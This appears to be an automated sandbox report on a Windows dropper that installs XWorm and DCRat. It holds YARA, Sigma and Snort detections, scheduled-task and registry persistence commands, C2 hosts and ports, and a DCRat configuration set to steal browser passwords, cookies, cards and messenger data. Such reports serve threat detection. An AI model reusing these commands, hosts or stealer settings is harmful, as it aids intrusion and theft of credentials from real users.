3.0.XClient.exe.480000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.0.XClient.exe.480000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x71d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7270:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7385:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7045:$cnc4: POST / HTTP/1.1
1.0.Result.exe.7c9678.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.0.Result.exe.7c9678.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x71d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf9d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7270:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xfa70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7385:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfb85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7045:$cnc4: POST / HTTP/1.1 0xf845:$cnc4: POST / HTTP/1.1
1.3.Result.exe.b10a30.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.3.Result.exe.b10a30.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x71d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7270:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7385:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7045:$cnc4: POST / HTTP/1.1
1.2.Result.exe.b08218.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.2.Result.exe.b08218.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x53d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5470:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5585:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5245:$cnc4: POST / HTTP/1.1
1.0.Result.exe.466afd.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.0.Result.exe.466afd.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x369d4e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x37254e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x369deb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3725eb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x369f00:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x372700:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x369bc0:$cnc4: POST / HTTP/1.1 0x3723c0:$cnc4: POST / HTTP/1.1
1.0.Result.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.0.Result.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x3c9a4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3d224b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3c9ae8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3d22e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3c9bfd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3d23fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3c98bd:$cnc4: POST / HTTP/1.1 0x3d20bd:$cnc4: POST / HTTP/1.1
1.0.Result.exe.415eec.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.0.Result.exe.415eec.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x3ba95f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3c315f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3ba9fc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3c31fc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3bab11:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3c3311:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3ba7d1:$cnc4: POST / HTTP/1.1 0x3c2fd1:$cnc4: POST / HTTP/1.1
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe, ProcessId: 7488, TargetFilename: C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\jdownloader\config\conhost.exe", CommandLine: "C:\Program Files (x86)\jdownloader\config\conhost.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\jDownloader\config\conhost.exe, NewProcessName: C:\Program Files (x86)\jDownloader\config\conhost.exe, OriginalFileName: C:\Program Files (x86)\jDownloader\config\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files (x86)\jdownloader\config\conhost.exe", ProcessId: 7280, ProcessName: conhost.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 7140, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , ProcessId: 7248, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe, ProcessId: 7488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FMxFFfLOKpqCLtTFEmbkPKJrDwH

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe, ProcessId: 7488, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 7204, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f, CommandLine: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe" , ParentImage: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe, ParentProcessId: 7488, ParentProcessName: ServerWeb.exe, ProcessCommandLine: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f, ProcessId: 7960, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 7140, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , ProcessId: 7248, ProcessName: wscript.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe" , ParentImage: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe, ParentProcessId: 7488, ParentProcessName: ServerWeb.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, ProcessId: 8016, ProcessName: schtasks.exe

Snort Signatures

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.4 - Destination IP: 147.185.221.19

Timestamp:	06/11/24-20:10:07.181847
SID:	2853193
Source Port:	53194
Destination Port:	50230
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.4 - Destination IP: 147.185.221.19

Timestamp:	06/11/24-20:08:24.216639
SID:	2855924
Source Port:	53174
Destination Port:	50230
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://a0991799.xsph.ru/@=AjM2MDZ4kjN

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Recovery\XClient.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Roaming\XClient.exe	Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Uninstall Information\OfficeClickToRun.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000008.00000002.1902459797.000000001290D000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: DCRat {"SCRT": "{\"9\":\">\",\"A\":\"_\",\"a\":\"#\",\"4\":\"&\",\"j\":\"`\",\"i\":\")\",\"0\":\"(\",\"o\":\"~\",\"D\":\"!\",\"k\":\"$\",\"y\":\"\|\",\"h\":\"@\",\"Q\":\"-\",\"H\":\"%\",\"S\":\" \",\"d\":\"<\",\"M\":\"\",\"3\":\",\",\"J\":\";\",\"L\":\".\",\"m\":\"^\"}", "PCRT": "{\"O\":\"^\",\"U\":\"\",\"v\":\"(\",\"V\":\")\",\"5\":\"!\",\"M\":\",\",\"Q\":\"$\",\"h\":\"-\",\"0\":\"_\",\"T\":\"~\",\"W\":\"@\",\"j\":\".\",\"1\":\"#\",\"L\":\"%\",\"K\":\"\|\",\"t\":\";\",\"y\":\">\",\"a\":\"<\",\"o\":\" \",\"B\":\"&\",\"u\":\"`\"}", "TAG": "", "MUTEX": "DCR_MUTEX-s86YqWdFI22lJKKIYeYT", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a0991799.xsph.ru/@=AjM2MDZ4kjN", "H2": "http://a0991799.xsph.ru/@=AjM2MDZ4kjN", "T": "0"}
Source: 1.0.Result.exe.7c9678.2.raw.unpack	Malware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "letter-takes.gl.at.ply.gg"], "Port": "50230", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files\Uninstall Information\OfficeClickToRun.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	ReversingLabs: Detection: 87%
Source: C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	ReversingLabs: Detection: 87%
Source: C:\Recovery\XClient.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\XClient.exe	ReversingLabs: Detection: 95%
Source: C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	ReversingLabs: Detection: 87%

Multi AV Scanner detection for submitted file

Source: ywXeiXEvP2.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.5% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe	Joe Sandbox ML: detected
Source: C:\Recovery\XClient.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\XClient.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\config\conhost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Uninstall Information\OfficeClickToRun.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.0.Result.exe.7c9678.2.raw.unpack	String decryptor: 127.0.0.1,letter-takes.gl.at.ply.gg
Source: 1.0.Result.exe.7c9678.2.raw.unpack	String decryptor: 50230
Source: 1.0.Result.exe.7c9678.2.raw.unpack	String decryptor: <123456789>
Source: 1.0.Result.exe.7c9678.2.raw.unpack	String decryptor: <Xwormmm>
Source: 1.0.Result.exe.7c9678.2.raw.unpack	String decryptor: XWorm V5.6
Source: 1.0.Result.exe.7c9678.2.raw.unpack	String decryptor: USB.exe
Source: 1.0.Result.exe.7c9678.2.raw.unpack	String decryptor: %AppData%
Source: 1.0.Result.exe.7c9678.2.raw.unpack	String decryptor: XClient.exe

Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\d908c538d2e8d0
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Multimedia Platform\d908c538d2e8d0
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\7ccfebd9e92364
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\9e8d7a4ca61bd9
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Uninstall Information\OfficeClickToRun.exe
Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe	Directory created: C:\Program Files\Uninstall Information\e6c9b481da804f

Source: ywXeiXEvP2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Result.exe
Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: ServerWeb.exe, 00000008.00000002.2226889345.000000001BF70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: ServerWeb.exe, 00000008.00000002.2226889345.000000001BF70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: ywXeiXEvP2.exe

Source: C:\Users\user\Desktop\ywXeiXEvP2.exe	Code function: 0_2_00007FF7C018647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7C018647C
